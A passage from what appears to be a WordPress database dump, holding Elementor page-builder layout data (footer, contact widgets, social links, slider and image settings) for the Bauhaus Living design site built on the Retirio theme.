id=\\\"107\\\"]\",\"_css_classes\":\"mc4wp-style-1\"},\"elements\":[],\"widgetType\":\"shortcode\"},{\"id\":\"4631f27\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"layout\":\"full_width\",\"content_position\":\"middle\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"88bc706\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"626a216\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"3710ec8\",\"phone_label\":\"021 22544768\",\"phone_address\":\"021 22544768\"}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"auto\",\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"0caec2f\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"3710ec8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\"}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"info_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":true},{\"id\":\"d70c8a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":100,\"align_tablet\":\"flex-start\"},\"elements\":[{\"id\":\"d12cde8\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"f98c238\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/ovathemes\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"93318f1\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ovatheme.envato\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-pinterest-p\",\"library\":\"fa-brands\"},\"_id\":\"f301bd3\",\"link\":{\"url\":\"https:\\/\\/ovatheme.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"96cddfe\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#1D1D1D\",\"icon_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"ova_social_icons_display\":\"inline-flex\",\"_element_width\":\"auto\",\"icon_padding\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_element_vertical_align\":\"center\",\"hover_primary_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"5931fd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.68,\"content_position\":\"top\",\"align\":\"flex-start\",\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":25,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"077\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"78\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02b9056\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9ce475a\",\"elType\":\"widget\",\"settings\":{\"menu_slug\":\"menu-explore\",\"menu_color_normal\":\"#808080\",\"text_typography_typography\":\"custom\",\"text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"menu_color_hover\":\"#E3B25A\",\"sub_menu_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_footer\"}],\"isInner\":false},{\"id\":\"18d6727\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.289,\"content_position\":\"top\",\"align\":\"flex-start\",\"background_background\":\"classic\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-footer-right.png\",\"id\":145,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"css_classes\":\"retirio_stretch_column_right\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.12,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":25,\"background_overlay_position_tablet\":\"initial\",\"background_overlay_xpos_tablet\":{\"unit\":\"%\",\"size\":-150,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"%\",\"size\":-150,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_overlay_size_tablet\":\"contain\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a3214d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6b9862e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"3710ec8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":\"on\",\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#808080\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"info_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"initial\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":191},\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f3df713\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#1D1D1D\",\"padding\":{\"unit\":\"px\",\"top\":\"21\",\"right\":\"10\",\"bottom\":\"25\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"5aa0f63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ebc849a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\\u00a9 All Copyright 2022 by Ovatheme.com\",\"align\":\"center\",\"text_color\":\"#808080\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3987,4888,'_elementor_page_assets','a:0:{}'),(3988,4888,'_elementor_pro_version','3.8.1'),(3989,4888,'_elementor_css','a:6:{s:4:\"time\";i:1668402138;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:0:\"\";i:2;s:9:\"fa-brands\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3990,4889,'_wp_page_template','default'),(3991,4889,'_elementor_edit_mode','builder'),(3992,4889,'_elementor_template_type','wp-post'),(3993,4889,'_elementor_version','3.8.1'),(3994,4889,'_elementor_data','[{\"id\":\"ef331a9\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/lines.png\",\"id\":139,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"initial\",\"background_overlay_xpos\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"%\",\"size\":135,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"%\",\"size\":145,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"%\",\"size\":-450,\"sizes\":[]},\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"auto\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.04,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_position_mobile\":\"initial\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"7d36326\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":58.992,\"content_position\":\"top\",\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"120\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bce0c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Le\'t turn your ideas into reality\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e5254c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[mc4wp_form id=\\\"107\\\"]\",\"_css_classes\":\"mc4wp-style-1\"},\"elements\":[],\"widgetType\":\"shortcode\"},{\"id\":\"4631f27\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"layout\":\"full_width\",\"content_position\":\"middle\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"88bc706\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"626a216\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"3710ec8\",\"phone_label\":\"021 22544768\",\"phone_address\":\"021 22544768\"}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"auto\",\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"0caec2f\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"3710ec8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\"}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"info_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":true},{\"id\":\"d70c8a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":100,\"align_tablet\":\"flex-start\"},\"elements\":[{\"id\":\"d12cde8\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"f98c238\",\"link\":{\"url\":\"https:\\/\\/twitter.com\\/ovathemes\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"93318f1\",\"link\":{\"url\":\"https:\\/\\/www.facebook.com\\/ovatheme.envato\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"social_icon\":{\"value\":\"fab fa-pinterest-p\",\"library\":\"fa-brands\"},\"_id\":\"f301bd3\",\"link\":{\"url\":\"https:\\/\\/ovatheme.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},{\"_id\":\"96cddfe\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#1D1D1D\",\"icon_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"ova_social_icons_display\":\"inline-flex\",\"_element_width\":\"auto\",\"icon_padding\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_element_vertical_align\":\"center\",\"hover_primary_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"5931fd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.68,\"content_position\":\"top\",\"align\":\"flex-start\",\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":25,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"077\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"78\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02b9056\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9ce475a\",\"elType\":\"widget\",\"settings\":{\"menu_slug\":\"menu-explore\",\"menu_color_normal\":\"#808080\",\"text_typography_typography\":\"custom\",\"text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"menu_color_hover\":\"#E3B25A\",\"sub_menu_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_footer\"}],\"isInner\":false},{\"id\":\"18d6727\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.289,\"content_position\":\"top\",\"align\":\"flex-start\",\"background_background\":\"classic\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-footer-right.png\",\"id\":145,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"css_classes\":\"retirio_stretch_column_right\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.12,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":25,\"background_overlay_position_tablet\":\"initial\",\"background_overlay_xpos_tablet\":{\"unit\":\"%\",\"size\":-150,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"%\",\"size\":-150,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_overlay_size_tablet\":\"contain\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a3214d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6b9862e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"3710ec8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":\"on\",\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#808080\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"info_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"initial\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":191},\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f3df713\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#1D1D1D\",\"padding\":{\"unit\":\"px\",\"top\":\"21\",\"right\":\"10\",\"bottom\":\"25\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"5aa0f63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ebc849a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2023 bauhaus living, develop by <a href=\\\"http:\\/\\/www.futuremediatrix.com\\\">futuremediatrix.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#808080\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3995,4889,'_elementor_page_assets','a:0:{}'),(3996,4889,'_elementor_pro_version','3.8.1'),(4007,4891,'_wp_page_template','elementor_header_footer'),(4008,4891,'_elementor_edit_mode','builder'),(4009,4891,'_elementor_template_type','wp-page'),(4010,4891,'_elementor_version','3.8.1'),(4011,4891,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_t